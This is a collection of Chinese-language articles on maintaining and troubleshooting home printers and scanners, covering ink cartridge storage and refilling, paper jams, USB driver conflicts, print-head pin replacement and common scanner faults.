    许多家庭出于成本考虑，在打印时一般都不会选用价格昂贵的专用喷墨打印纸，而通常使用复印纸来代替。这样做未尝不可，但一定要选用质量过关的复印纸，纸质应致密，光洁度要高，不要带有太多的纸粉。其中，劣质复印纸因其纸质疏松、表面粗糙，会对打印头磨损严重，从而减少了打印机的使用寿命。

    三、存放墨盒小窍门
    在家用喷墨打印机中，墨盒应算是其中最主要的耗材了，我们要想降低打印成本，必然要打墨盒的主意。由于大部分的家庭用户平常不经常使用打印机，并且一次打印的量也不多，因此家用打印机总是使用一阵子,然后又闲置一阵子。我们如何有效保存已开封的墨盒呢？是随随便便找个地方就放，还是给墨盒找个安稳的“家”？两种做法，其效果却相差很大。在这里，笔者告诉各位一个存放墨盒的小窍门，我们在拆开新墨盒的外包装时，请小心地拆开塑料封盖，保持墨盒外包装的完整（这里的外包装，指的是与墨盒“贴身”的硬塑料护壳，可不是最外层的纸盒子）。这样，等到墨盒暂时不用时，我们就把它放回塑料盒中，并将已掀开的塑料封盖用双面胶带紧密粘合，以确保墨盒与外界隔绝。笔者采用此方式，曾成功地将一只开封后的墨盒安然保存了一年之久。如果瞧不上这些土办法，那么我们也有更好的安全存放的方法。不过，这就需要我们稍稍“破费”了。例如笔者所用的佳能打印机墨盒，在市场上就有专门的墨盒存放匣（见图2），方便我们存取墨盒。

    四、打印机夹纸不要急
    家用喷墨打印机基本上都采用直接进纸通道，即从顶端进纸，打印纸几乎不用弯曲，就直接从下方送出来，因此夹纸的现象大为减少。但是，那些采用打印纸在打印机里“翻个身”式设计的打印机，则相对容易出现卡纸的现象。另外，由于静电吸附造成多张打印纸裹挟进纸（这在气候干燥时很常见），或打印纸张不平有所翘曲时，都有可能在各种喷墨打印机中出现夹纸现象。遇到这种情况，各位一定不要心浮气躁，鲁莽地揪扯被夹住的纸张，这样做有可能损伤那些细小的塑料输送齿轮，使得打印机出现进纸故障。正确的做法是先关掉电源，拔去电源插头，再打开打印机前盖，必要时拿掉墨盒（如图3），拉着打印纸顺着齿轮输送纸张的方向，缓缓加力将纸小心取出即可。
    为避免出现卡纸的故障，我们应在填装打印纸之前，将纸张多“抖搂”几遍，消除掉静电。

    五、注墨之前多琢磨
    墨盒里的墨水用完后，很多用户都会再买瓶新墨水把它重注入墨盒中，再接着使用。但在注墨前，我们应首先清楚几个细节:假如我用的是打印头一体化墨盒，那么不注白不注，反正墨盒也没什么用了，与其扔掉，倒不如再废物利用，就算打印效果不理想，一般也不会对打印机有什么损害;假如用的是打印头与墨盒分体的打印机，那么在重注墨水时，我们最好选择原厂的墨水，因为选用兼容墨水，打印机厂家通常都会取消用户的保修资格，要是不慎弄坏了打印头，就真是因小失大了。

    六、不要频繁清洗打印头
    有些型号的喷墨打印机会在驱动软件里提供清洗打印头的选项，可以实现定期清洗、手工清洗或打印前清洗等等操作。虽然清洗打印头之后，打印效果能得到改善，但清洗打印头却是相当费墨。我的体会是只要注意保养，并养成正确的使用习惯，打印头并不需要经常清洗。我们完全可以将清洗打印头选项设成手工清洗，待发现打印质量下降时再手工执行清洗操作，这样会节约宝贵的墨水。


解决USB打印机端口设置故障

《一键清理系统垃圾》

解决USB打印机端口设置故障

    朋友许最近新购一台EPSON C40彩色喷墨打印机，在经销商处测试能安装并可正常打印，但装到自家的电脑上就是不能打印，安装没问题，就是端口设置有问题导致数据不能传输到打印机，而且也不能更改端口设置。经销商上门服务时提示可能EPSON打印机的驱动与许电脑里的瑞星杀毒软件的监控程序有冲突，试着屏蔽该监控程序之后，仍然无法解决此问题，试着卸载瑞星杀毒软件之后，也无法解决此问题，在时间仓促之下，经销商建议重装系统。

    在多方协调无法解决的情况之下，许只好请我帮忙调试。我将打印机拿到我家测试，也能安装，但是需要将默认的usb端口指定到usb system端口后才可以正常打印。这就怪了，打印机也挑电脑呀？看来我得弄清楚许的电脑有什么特殊之处——

    经过一番盘问，了解到经销商的电脑主板用的是Intel芯片组，我的电脑主板也用Intel芯片组，而许的电脑主板用的是VIA芯片组，问题就在这了——许的电脑主板VIA芯片组驱动没装对，我自信地对许说出了问题所在之处。

    但我还是心存侥幸，觉得USB驱动没装好，于是我拔号上网到VIA网站，下载USB Filter Driver（Windows 2000/9x/NT，v 1.08，12/12/2000）并安装，然后重装打印机驱动，查看端口设置仍然有问题，试图指定端口，但不成功，因此还是无法打印。

    不会让我按经销商的建议帮许重装系统吧？那可花费我不少时间，但是那天正好是周日，我有空，在经过一番调试失败之后，我无奈地帮许重装Win98se操作系统，漫长的半小时过去了，系统重装好了，然后安装USB Filter Driver，重装打印机驱动，结果问题同上，还是无法打印。
    和我一样失望的许问我，真的没有办法啦？

    我无语，心里想着或许将C盘格式化后重装系统和VIA四合一驱动可以解决这个问题，但这最后一招我真不愿用，因为许的电脑缺驱动、缺软件，这要花费我不少时间呀！但在许的一再请求之下，我只好供出这最后一招了。

    接着我拔号上网到VIA网站下载VIA 4in1 Driver（VIA四合一驱动，Windows 2000/9x/NT，v 4.31，06/01/2001），之后又是漫长的格式化C盘，重装Win98se操作系统，然后安装VIA 4in1 Driver，声卡驱动，显卡驱动，最后重装打印机驱动，这下可好，电脑自认打印机端口，完全不用设置，打印测试页没问题，打印一些图片和文档也没问题，终于大功告成！

    成功之时正值深夜，真是辛苦呀：P，之后再装Office2000、金山毒霸、常用游戏（BH2000、CS）等等不再详述，总之测试之后发现和大多数软件没有冲突。

    这里需要提醒各位看官的是：当您遇到此类电脑不能正确识别外设的问题时，不妨从主板芯片组驱动处着手解决。另外，正确的VIA四合一驱动安装方法应该是在重新安装windows之后，首先安装四合一驱动，然后安装声卡、显卡驱动、Modem以及网卡等硬件设备的驱动程序


快速更换针式打印机的断针和线圈

《一键清理系统垃圾》

快速更换针式打印机的断针和线圈

    尽管打印机类型换代快，但从经济适用出发，人们仍然普遍乐于接受针式打印机的服务，但面对经常出现的断针、断线圈的情况，往往令人束手无策且维修起来不胜其烦。下面以EPSON LQ－1600K针式打印机为例介绍一种便捷快速的诊断和更换方法：
    1.诊断
    首先，应判断是断针还是断线圈。为此，小心地把打印头拆下来，仔细检查上面24根针是否完好。假如发现有缺针时可以根据^50030402a^1判断（图中字母为短针、数字为长针），通过对应的插针空孔就可知道缺少的是长针或是短针。如检查到24针都完好则可能断的是打印针驱动线圈。可用万用表1×100R挡测量打印头后面的信号连线插槽。其方法是：把打印头上印有“EPSON”的一侧面对胸口，可看到分两层排列的插槽（如^50030402b^2）。上层引脚连接的是长针线圈，有1～15个脚，6、7、8脚是公共端，测量时用一表笔接6、7、8的任一脚，另一表笔测6、7、8以外的任一脚，电阻都应为30欧姆左右。如发现其中任一脚有电阻为无穷大的现象，则断定该脚连接的线圈已断，需更换。而下层短针插槽则以7、8、9脚为公共端，测量方法同上。但要注意短针插槽则以7、8、9脚为公共端，测量方法同上。还要注意短针插槽15、16脚因连接一电容，测量时电阻值在10千欧以上是正常的。
    2.拆开打印头
    确定打印机是断针或断线圈后，必须拆开打印头修理。由于打印头外壳是用硅胶粘住的，用手是按不出打印头的。有个“土办法”可把打印头敲出来。先找三根粗一点的铁钉和一块小木板，再根据打印头外壳的宽度分3个角把铁钉钉在木板上，再把打印头放上去定好位；用一根木棒的一端顶住铜盖，一端用小铁锤轻轻敲击，将打印头抵出。注意在打印头快脱离时应停止敲击，用手按出打印头。再用一字形螺丝刀撬三角钢套，使打印头脱离，取下铜盖。如是断线，则依次取出长针和短针，再次检查断针情况，配好所需的针。
    3.装针
    因LQ－1600K打印机针分两层排列，装针时较为困难，且不易判断长短针的位置，可采用以下方法装针：
    装短针，^50030402c^3所示的插针孔分外圈和内圈两圈，外圈椭圆形的是短针插孔；内圈圆形的是长针插孔。插入短针时按图3所示沿外圈1脚按顺时针依次插入1、3、5、7、9、11、2、4、6、8、10、12针，边插边倒转打印头检查出针孔是否每插入一根短针都相隔一个孔（出针应和图1对应）。如是则可放心依次插入。装长针时也以同样的方法按图3所示B脚的位置按顺时针沿内圈依次插入B、D、F、H、J、L、A、C、E、G、I、K即可。
    4.换线圈
    用万用表1×100R挡，查出具体是哪一根线圈开路后，用烙铁和吸锡器把线圈两端的焊锡吸走；再用刀片小心切开粘住线圈的硅胶，取出线圈。然后换上好的线圈，焊好线圈引脚的锡即可。
    5.调试
    装好打印头后，装入一张A3尺寸纸并横放，然后同时按住打印机上的联机键和换行键打开打印机电源开始测试。仔细观察打出来的字符是否完整，如正常则表明打印头已修复。


联想LJ6P激光打印机复活记

《一键清理系统垃圾》

联想LJ6P激光打印机复活记

    一日去亲戚家帮助修理联想LJ6P激光打印机。该打印机的故障现象是：加电开机，面板上四个指示灯依次亮过后，便只有第二、第三灯在不停地闪烁报警。从指示灯闪烁的情况看，不像有严重损坏的迹象，好像是一般打印机缺纸或未联机时的状态。据亲戚说：“一开始还偶尔能打出来，就是颜色很淡，后来就再也无法打印了。”于是我小心地拆下磁鼓、加热辊等部件，依次清洁处理，然后装机一试，故障依旧。看来这样漫无目的地搞不行，还得先按故障指示去进行，我立刻驱猫上网直奔联想网站，一番搜索后，找到了有关LJ6P打印机的一些技术资料。其提示信息说：打印机面板上第二、第三指示灯闪烁是卡纸故障。如此一来就好办了，卡纸是打印机常见故障之一。于是我再次拆下磁鼓、加热辊等部件，并仔细清洁打印机内腔，特别是加热辊下部的出纸传感器，使其转动灵活。等一切处理完毕后，再次通电自检。咦？怎么还是这个故障，正当我一筹莫展之际，无意间掀开了后面送纸器的盖板，一眼瞥见里面有一个硬币，拿灯仔细一照，好家伙里面东西还真不少，我用镊子小心地夹出一枚硬币、一根橡皮筋、还有进纸轮下的一片纸。我小心地放上纸，再次开机自检。嗡……打印机预热的蜂鸣声过后，开始吸纸，并欢快地把打印样纸送出了打印机。卡纸故障排除了。看来打印机硬件电路没有问题，机械部份和传感器部份也基本正常。再拿起自检样张仔细端详，上面字迹确实很淡，尤其是左面有一竖行印不上东西，估计是磁鼓部份有纤维或其它异物所致。再次打开磁鼓盒，并顺手抽出墨粉筒，经检查没有墨粉了。在征得亲戚同意后，花290元买了一个专用粉筒。换上粉筒后再试，打印机终于欢快地送出了自检样张。


喷墨打印机的维护技巧

《一键清理系统垃圾》

喷墨打印机的维护技巧

   用户学会正确维护好打印机就是要使自己能够排除一些常见故障，让打印机时刻处于正常状态。喷墨打印机最常见的故障是供墨不畅。
   表现为：打印缺线、粗糙、线细、线淡、时断时续，甚至根本打印不出。
   出现故障的时间一般在：
   ★原装墨盒里的墨水即将用完。
   ★打印机搁置了一段时间未用。
   ★灌装了非原装墨水。
   ★打印机使用环境较差长期不保养。

   为什么会堵塞

   原装墨盒里的墨水即将用完。
   墨盒里的空气加上墨盒外部的空气进入到喷嘴管道中，使管道中墨水的水分蒸发干涸，剩下的细小颗粒集结成块将喷嘴管道大部堵塞，这是一种弥漫型堵塞，可以呈网状结构迅速延伸，也是各种堵塞症状中比较严重的一种，处理不及时或处理不当，将造成打印头报废。
   排除办法：这时实际上已经应该更换墨盒了，而且最好更换原装墨盒，因为原装墨水中含有溶解墨水颗粒的活性成分，并且可以避免因为墨水成分不同使故障扩大化。更换墨盒后可以依照本文介绍的清洗方法中的1、2步骤进行清洗。如果反复三次仍无效果，则基本上可以认为该打印头已经报废。幸运的是只要我们能够严格按照打印机使用手册上要求的方法去维护、保养和保管，并且注意本文介绍的知识与经验，实践中这种堵塞情况引起的报废并不多。
   打印机长期闲置
   这里有三种情况：
   1、打印头、墨盒均装在打印机上，只是很久（一两个星期以上）未使用了。
   2、墨盒卸下了一段时间，打印头却留在打印机上；或者打印头、墨盒卸下以后分离保管；或者直接将打印头、墨盒卸下以后搁置一边。
   3、打印头、墨盒已经按要求卸下保管，但是装上后不能使用。
   第一种情况堵塞的部位只是在喷嘴的最外部，而且多数时候并不是墨水蒸发造成的，而是由沾附在喷嘴外部的脏物干涸堵住了喷嘴。仔细分析，这些脏物主要来自纸张上的胶原体被打印头移动时刮下并吸附在打印头喷嘴周围，这些胶原体又被喷出的墨水溶化成半固体的胶状物在打印头移动时就像一团泥巴堵住了喷嘴。
   排除办法：轻度的堵塞依照清洗方法1就能解决问题，当方法1无效或畅通后第二天又堵塞时就必须依照清洗方法2去做，清洗以后如果打印出来的是很淡的水渍，说明问题多半已经解决，只要继续试打四五页纸墨色就会恢复正常。
   第二种情况造成堵塞的成因基本上与“原装墨盒里的墨水即将用完”相同。只是这是人为错误造成的，因此后果比前面严重得多。
   排除办法：正确的保管方法是将打印头连同墨盒一起卸下，扣上保护片，装入双层塑料袋中挤出空气后扎紧再竖直放入小纸盒中。
   第三种情况多数如同第一种情况，堵塞的部位只是在喷嘴的最外部。如果正好遇上墨水即将用完，那是比较“倒霉”的。
   排除办法：无论什么时候，都不能让打印头墨水干涸。为了防止墨水损失，干脆等到用时再加的想法是十分危险的。
   灌装非原装墨水
   一种是很快就不出墨，一种是堵塞的发生比以前频繁。如果灌装的墨水的化学成分与原装墨水相抵触或质量指标未达到喷墨打印机墨水的质量标准，就会发生很快不出墨。这种情况比较少见，主要发生在一些新上市的灌装墨水品牌中。
   使用灌装墨水的确是节约成本的好办法，而且经过实践证明只要操作和维护得当，并无多大危害，其负面影响只在于打印质量上，往往使用灌装墨水打印出来的墨色比原装墨水淡并且可能会“化”，造成层次感差。所以，在打印质量要求不是很高而且打印工作量很大时使用灌装墨水会省下很多钱的。
   那么为什么堵塞的发生比以前频繁呢？这里除了墨水成分的变化使“分泌”的污物可能增多外，一个重要的原因是：灌装墨水的颗粒可能会比原装的大，更有一些人在“灌装”操作时无意之中将尘埃颗粒带入墨水中。
   如果认为喷管前部的滤网可以有效阻挡住这些颗粒，那就错了。在放大镜下可以发现网孔比喷管孔大许多。这些颗粒沉入底部在负压的作用下很有机会堵住喷嘴管进水口，发生这种情况如果不能及时排除可能会造成永久堵塞。
   排除办法：依次按照本文介绍的1、2、3步认真去做。在进行第3步操作时千万注意是向里吹，而不是向外吸，并且注意不要让打印头沾染上口水。只要认真一般都会马到成功。
   从这里我们可以看到，“灌装”操作是否正确何等重要。
   正确的“灌装”方法：
   1、用沾水棉球擦拭打印机。
   2、用清水冲洗墨盒灌水口的塞子和喷嘴部位，注意不要让水渗入墨盒内部，电路板沾上一点水问题不大，拭干就行。
   3、启出的塞子要放在干净的玻璃板上。
   4、注墨时不要过快，不要让墨水溢出后又流回墨盒内，更不能将已经洒落的墨水再吸起后注入墨盒。
   5、不要冒险使用价格很低的墨水。
   打印机缺乏保养、使用环境差
   这种情况如：打印头、墨盒均装在打印机上很久未使用。脏物像泥巴一样堵住了喷嘴。清洗和保养方法前面已经讲过。

   打印头的清洗方法

   以EPSON的Stylus Photo 1200打印机为例，按Power钮打开打印机电源，按下清洗键持续四秒，打印机会自动清洗打印头。（吃饭本事）
   找一个干净的酱菜瓶铁皮瓶盖盛满开水，卸下打印头，用自来水冲洗掉可见的脏物，注意不要用手触摸喷嘴口，将喷嘴部分平稳地浸入开水中，约4~5分钟，如果水温降低过快可以换一次水。（看家本领）
   高举打印头，对准喷嘴口猛吹一口气。（秘技）
   另外，清洗打印头的方法，请参看2001年第9期15版。


喷墨打印机日常的基本维护

《一键清理系统垃圾》

喷墨打印机日常的基本维护

作为一名用户，当然是希望自己的喷墨打印机打印效果好、噪音低、寿命长的啦。工欲善其事，必先利其器，下面介绍一些在日常使用喷墨打印机过程中应注意的维护事项，供大家在维护过程中做个参考！

打印机必须摆放在一个稳固的水平面上工作，如果打印机所放的水平面不稳固，打印时会影响打印效果。不要在打印机顶端放置任何杂物，否则会为打印机增加外力，严重时会
导致打印机变形。为了防止灰尘或者其他东西进入到打印机体内，我们不用打印机时必须要关闭其前盖，假如你的打印机长期不用的话，最好用布之类的东西罩住。

如果打印输出不太清晰或者是有条纹，可用打印机的自动清洗功能清洗打印头。大多数喷墨打印机开机即会自动清洗打印头，并设有按钮对打印头进行清洗。如佳能绝大部分喷墨打印机就设有快速清洗、常规清洗和彻底清洗三档清洗功能，具体清洗操作请参照喷墨打印机操作手册中的步骤进行就可以了。但是，如果连续清洗几次之后打印仍不满意，应该是墨水已经用完，需要更换墨盒。墨盒未使用完时，最好不要取下，否则会造成墨水浪费或打印机对墨水的计量失误。一般来说，打印机的墨水放在打印机内在短时间内不会发生硬化之类的变质，所以我们没有必要把墨盒取出来。不过，如果你的打印机真的长期不用的话，那就需要把墨盒取出来了，这样可以防止墨水变质，也确保了喷头的寿命。

在打印机关机之前，应该让打印头回到初始位置。有些打印机在关机前自动将打印头移到初始位置，也有些打印机在关机确认处在暂停状态才可关机。打印头回到初始位置可以受到保护罩的密封，使喷头不易堵塞，也可以避免下次开机时打印机重新进行清洗打印头操作浪费墨水。请大家注意自己的打印机是否是在初始位置时处于机械锁定。如果属于这种情况，用手移动打印头是不能够移开其初始位置，假如用强力移动打印头，会造成打印机机械部分的损坏。

    当墨盒中的墨水用完以后，一般的情况下当然是更换一个新的墨盒啦。不过，众所周知，一个新的墨盒起码几十元，所以，不少的用户用兼容墨水给墨盒加墨，这样可以节省一些钱。但是，兼容墨水是比较有学问的，喷墨打印机墨水要求具有超小的分子量，适中的渗透率、一定的粘度比和化学输墨助动性，只有这样墨水才能在喷头上顺畅地受控喷射，才能保证打印精度。如果兼容墨水达不到以上的标准，很容易使喷头由于堵塞而立即报废，这是需要用户注意的问题。
    换墨盒时一定要按照操作手册中的步骤进行，而且要在电源打开的状态下进行上述操作，因为重新更换墨盒后，打印机将对墨水输送系统进行充墨，这个过程在关机状态下是不能够完成的。同时，关机状态下打印机也无法检测到重新安装上的墨盒，有些用户曾经问过为什么装上新的墨盒还是不能够打印，就是这样的原因。同时，有一部分打印机对墨水容量的计量是使用打印机内部的电子计数器来计数的，当计数器到达一定值时，打印机判断墨水用尽。这时，更换墨盒后打印机会对其内部的电子计数器进行自动复位，从而确认安装了新的墨盒。

    墨盒在长期不使用时应置于室温下避免日光直射，否则会容易变质。众所周知，墨水具有导电性，但是，很多的用户都没有注意到，当有些墨水漏洒在电路板上，他们只是简单地处理擦一下就了事，正确的办法应该是使用无水酒精擦净、晾干后再通电，否则会很容易烧坏电路板。如果你觉得喷头出现问题时，应该在不带电的状态下进行拆卸喷头，同时，不要把拆卸下来的喷头放在静电较多的地方，以免因静电造成喷头内部电路损坏。

    好了，关于打印机的日常维护笔者就介绍到这儿，希望能对有打印机的用户有所帮助。


普通针式打印机常见的故障

《一键清理系统垃圾》

普通针式打印机常见的故障

问题一：打开打印机电源开关，打印机“嘎、嘎”响，并报警，显示无法联机打印。

    治疗方法：这与使用环境和日常的维护有着很大的关系。如果使用的环境差，灰尘多，就会较易出现该故障。因为灰尘积在打印头移动的轴上，和润滑油混在一起，越积越多，形成较大阻力，使打印头无法顺利移动，导致无法联机打印。所以你只要关掉电源，用软纸把轴擦干净，再滴上缝纫机油后，反复移动打印头把脏东西都洗出擦净，最后在干净的轴上滴上机油，移动打印头使分布均匀，开机即可正常工作。

问题二：打印出的字符缺点少横，或者机壳导电。

    治疗方法：这是由于打印机打印头扁平数据线磨损造成的。打印机打印头扁平数据线磨损较小时，可能打印出的字符缺点少横，会误以为打印头断针。当磨损较多时，就会在磨损部分遇机壳时导电。解决办法很简单，更换扁平数据线即可。


浅议激光打印机的卡纸问题

《一键清理系统垃圾》

浅议激光打印机的卡纸问题

    1. 防卡纸的技巧

    激光打印机最常发生的故障是什么？卡纸！

    有一些有益的技巧可以减少卡纸故障的发生。

    散开纸张 从纸包中取出一叠纸张装入打印机的纸盒之前，应用手握住纸的两端，正反弯曲几遍，并分别只握住一端抖动几下，目的是使纸张页与页之间散开，减少“夹带纸”以及随后的卡纸现象。整理齐后再将纸放入纸盒中使用。

    纸盒不要太满 纸盒装得太满也会引起“夹带纸”现象，纸张导引槽也不要卡得太紧，否则也会引起卡纸。

    使用适宜的纸张 优质复印纸无疑是适合激光打印机使用的。不是激光打印机专用胶片或棉织物纸张，不要在激光打印机中使用，否则承受不了高温引起物理或化学变化，从而沾污精密部件。激光打印机使用的纸张必须干燥且不能有静电，否则易卡纸或导致打印文件发黑。对于有些易卡纸的打印机，不要将刚打印过的纸张紧接着又放入进纸槽中供打印，因为纸上还有少量的静电，容易引起卡纸。

    厚纸打印 打印厚纸时宜使用手动进纸。

    标签纸 尽管激光打印机允许打印标签纸，但不得不说打印标签纸是很容易引起卡纸故障的。为了真正省钱，还是不用激光打印机打印标签为好。

    不干胶标签纸 采用手动进纸可以减少不干胶纸被剥离的可能性，更应注意的是应该使用未揭开过的完整的纸张。若为了节省几分钱，而使用已揭开用掉一部分的不干胶纸，让胶粘剂粘附在打印机内部是得不偿失的。

    信封 信封打印时容易被粘住，解决这个问题的办法不多，最重要的一条是使用高质量的信封。信封上不要有装饰物、透明薄膜窗以及邮票等多余的东西，应注意不要让信封卷曲在纸盒内。

    2. 卡纸的处理

    如果在打印一个长文件的过程中出现卡纸，被“卡住”的那页将可能会被“丢失”，为了让处理卡纸故障后打印机能重新打印这页文件，应该打开打印机的“JamRecovery”模式。在Word中你可以重新指定打印丢失的单页，但其它应用程序中打印操作可能就没有这一功能了，所以还是要将打印机设置为卡纸恢复后从被中断页开始重新打印。

    卡纸后处理的重要一条，就是注意沿纸张正常传送的方向拉出被卡住的纸张。

    卡纸后，打开打印机翻盖，若有必要，还需取出硒鼓，将打印机的纸厚调节杆拉到最厚纸张的位置，这样减少传纸机构的阻力。用双手轻轻拽出被卡住的纸张，此时注意不要用力过猛，以免拉断纸张。不要用夹子之类的工具去拉取纸张，以免划伤精密部件的表面。取出被卡纸张后，或许会附带散落出一些墨粉，此时最好使用微型吸尘器将其吸取干净。


轻松化解扫描仪故障

《一键清理系统垃圾》

轻松化解扫描仪故障

论是什么品牌的扫描仪，无论扫描仪的质量有多好，无论是在扫描图象或普通的文稿，扫描仪在长时间地工作过程中，总避免不了会遇到一些故障发生，如果我们不能有效地将这些常见的扫描故障快速地解决掉的话，那么扫描仪的工作效率显然就会受到一定程度的影响。为了帮助各位更好地提高扫描仪的使用效率，本文下面就从扫描仪的常规故障现象着手，来向各位介绍一些轻松化解扫描故障的经验、方法！

    1、化解扫描仪异常声音

    有一些型号的扫描仪，每次接通电源并对它进行预热扫描时，扫描仪总会发出一些奇怪的声音。当我们不幸听到这些奇怪的声音，特别是咔、咔的声音时，就一定要先检查一下扫描仪“身体”背部是否有扫描锁或类似装置，要是有的话还要检查一下此时该装置是否处于打开状态，如果没有打开的话，那么扫描仪发出的一些奇怪声音、特别是咔、咔的声音多半是扫描锁没有被打开引起的。要想化解扫描仪异常声音，我们必须想办法将扫描锁装置打开，如果我们不会操作该装置的话，不妨查阅一下扫描仪的操作说明书，相信会能找到打开扫描锁的具体操作方法。要是在扫描锁已经处于打开的状态下，扫描仪仍然发出一些奇怪声音的话，那我们基本就能断定扫描仪的扫描锁存在硬件故障，此时唯一的办法就是将扫描仪设备送到厂家去修理，或者请专业的工作人员上门修理扫描锁。

    2、化解扫描网格故障

    在扫描类似报纸或杂志、书本这样的文稿时，常常会出现网格现象，这种现象是不是由扫描仪引起的呢，那我们有没有办法将这样的故障现象排除掉呢？

    其实扫描仪在扫描报纸、杂志这样的特殊文稿时，出现网格现象是常有的事情，这种现象多半不是由扫描仪自身引起的，而是扫描文稿自身在印刷出厂时使用了网点印刷技术，这种技术直接导致了报纸、杂志等特殊文稿在被扫描仪扫描处理的过程中，自动出现了网格现象。因此，对于扫描仪来说，网格现象并不能算是扫描仪的故障，充其量只能算是扫描仪在处理特殊文稿时所特有的一种现象。当然，这种现象的存在毕竟会对扫描效果产生影响，为此现在不少型号的扫描仪都在其最新版本的驱动程序中，开始内置了去除扫描网格的功能，我们只要在对报纸、杂志这类特殊文稿进行正式扫描之前，先对扫描仪驱动程序进行一下正确设置，以便事先将消除网格功能启用起来，以后扫描时就不会出现网格故障了。

    3、化解扫描灯管无法熄灭

    笔者朋友有一台型号为HP ScanJet 4200C的扫描仪设备，每次将该设备的电源接通时，扫描仪灯管工作状态都很正常，可是在半个小时之内没有使用扫描仪扫描图象或其他文稿，或者将与扫描仪直接相连的计算机系统关闭后，扫描灯管无法象其他扫描仪那样自动熄灭，不知道这是怎么回事？

    通常情况下，扫描仪无法自动熄灭，是由于扫描仪驱动程序没有正确安装好，导致记录扫描灯管工作状态的驱动文件发生了错误引起的，此时我们可以借助原始的驱动安装光盘，来将那个记录扫描灯管工作状态的驱动文件重新恢复一下就可以了。对于HP ScanJet 4200C型号的扫描仪来说，记录扫描灯管工作状态的驱动文件一般是hplampc.exe文件，在恢复该文件时我们可以先将对应型号的扫描驱动光盘放入到物理光驱中，然后从中找到hplampc.exe文件，并将该文件直接复制到本地计算机中的“X:\Windows\Start Menu\Programs”文件夹中;之后将本地计算机系统重新启动一下，这个时候hplampc.exe文件记录的状态信息数值就会被恢复到默认设置状态，那么扫描灯管日后就能自动熄灭了。


扫描仪

《一键清理系统垃圾》

扫描仪

[color=Green]扫描仪的普及率越来越高了，但是这类外设的故障也比较多，而且故障的原因也比较复杂。以往的手持式扫描仪、滚筒式扫描仪现在都不是市场的主流了，而平板扫描仪才是最受欢迎的。就使用寿命来说，平板扫描仪是最长的，其次是滚筒式扫描仪，手持式扫描仪的使用寿命相对较低。这主要是因为这三种扫描仪的内部结构不同，使用方式不同所致。

    我们先来了解一下扫描仪的工作方式，其实很简单，就是利用光源照射原稿或者图片

    上产生高亮度反射光线，光线通过反射镜、透射镜，由分光镜进行色彩分离，照射到CCD(电荷耦合器件，Charge Coupled Device)元件上，CCD元件将光信号转换为电信号，传送到计算机中。因此，扫描仪的关键配件是CCD，它的品质直接影响着扫描仪的性能。

    扫描仪主要由感光器件、大功率的日光灯管、驱动马达、驱动皮带、模数信号转换器所组成，其中感光器件的工作是将感应到的光信号转换成电信号。大功率光管用于对文字或者图像进行强烈的照射以达到完全感应的作用。驱动马达的作用是带动日光灯管，将光一步步扫过需要的物品。驱动皮带是与驱动马达一齐带动日光灯管的装置。模数信号转换器也就是将模拟电信号转换成为数字信号以供电脑识别。

    确定故障的方法可以是观察法，观察产生故障的原因，确定有问题的部件，例如扫描仪没有响应，可以考虑到电源线有没有接好；也可以是测试法，进行测试，确定有问题的地方，例如扫描一张图片，发现扫描的图像不够清晰；还有筛选法，当用观察法的时候发现可能引致故障有几个部件的时候，可以使用筛选法进一步确定故障部位。有时候多使用一些方法，便可以确定故障的源头，然后寻求解决的办法。
[/color]
[color=Red]常见故障一：找不到扫描仪[/color]
[color=Blue]相信这是最常见的故障。先用观察法看看扫描仪的电源及线路接口是否已经连接好，然后确认是否先开启扫描仪的电源，然后才启动计算机。如果不是，可以按Windows“设备管理器”的“刷新”按钮，查看扫描仪是否有自检，绿色指示灯是否稳定地亮着。假若答案肯定，则可排除扫描仪本身故障的可能性。如果扫描仪的指示灯不停地闪烁，表明扫描仪状态不正常。这时候可以再重新安装最新的扫描仪驱动程序。同时，还应检查“设备管理器”中扫描仪是否与其他设备冲突(IRQ或I/O地址)，若有冲突就要进行更改。记住，这类故障无非就是线路问题、驱动程序问题和端口冲突问题。 [/color]

[color=Red]常见故障二：扫描仪没有准备就绪[/color]
[color=Blue]打开扫描仪电源后，若发现Ready(准备)灯不亮，先检查扫描仪内部灯管。若发现内部灯管是亮的，可能与室温有关，解决的办法是让扫描仪通电半小时后关闭扫描仪，一分钟后再打开它，问题即可迎刃而解。若此时扫描仪仍然不能工作，则先关闭扫描仪，断开扫描仪与电脑之间的连线，将SCSI ID的值设置成7，大约一分钟后再把扫描仪打开。在冬季气温较低时，最好在使用前先预热几分钟，这样就可避免开机后Ready灯不亮的[/color]

[color=Red]常见故障三：扫描出来的画面颜色模糊 [/color]
[color=Blue]首先通过观察法看看扫描仪上的平板玻璃是否脏了，如果是的话请将玻璃用干净的布或纸擦干净，注意不要用酒精之类的液体来擦，那样会使扫描出来的图像呈现彩虹色。如果不是玻璃的问题，请检查扫描仪使用的分辨率是多少，如300dpi的扫描仪扫1200dpi以上的影像会比较模糊。因为300dpi的扫描仪扫1200dpi相当于将一点放至四倍大。另外，请检查显示器设置是否为16bit色或以上。如果是扫描一些印刷品，有一定的网纹造成的模糊是可以理解的，处理方法可以用扫描仪本身自带的软件，也可以用Photoshop等图像软件加以处理。 [/color]

[color=Red]常见故障四：输出图像色彩不够艳丽 [/color]
[color=Blue]遇到这种故障，我们首先可以先调节显示器的亮度、对比度和Gamma值。Gamma值越高，感觉色彩的层次就越丰富。我们可以对Gamma值进行调整。当然，为了求得较好的效果，你也可以在Photoshop等软件中对Gamma值进行调整，但这属于“事后调整”，我们可以根据扫好的照片的具体情况进行Gamma值的调整。在扫描仪自带的软件中，如果是普通用途，Gamma值通常设为1.4；若是用于印刷，则设为1.8;网页上的照片则设为2.2。还有就是扫描仪在使用前应该进行色彩校正，否则就极可能使扫描的图像失真；此外还可以对扫描仪驱动程序对话框中的亮度/对比度选项进行具体调节。

    扫描仪的问题通常出自扫描效果，这往往也是软件故障之一，不同的扫描仪对这些软件故障有不同的解决办法，可以利用相关软件进行修正。而硬件故障方面主要是接口、线路问题，只要大家连接好线路、设置好端口，用最新的驱动程序，这些问题应该是容易解决的。


扫描仪常见故障及其解决方案

《一键清理系统垃圾》

扫描仪常见故障及其解决方案

   1、开启扫描仪时出现“SCSI card not found”提示
   SCSI卡上设置了保险丝，当遇到不良电路状况(电压不稳或短路等)会自动断开，待线路良好或测得温度降低后会自动连接。我们避免不良电路状况对扫描仪造成的损害。

   2、找不到扫描仪
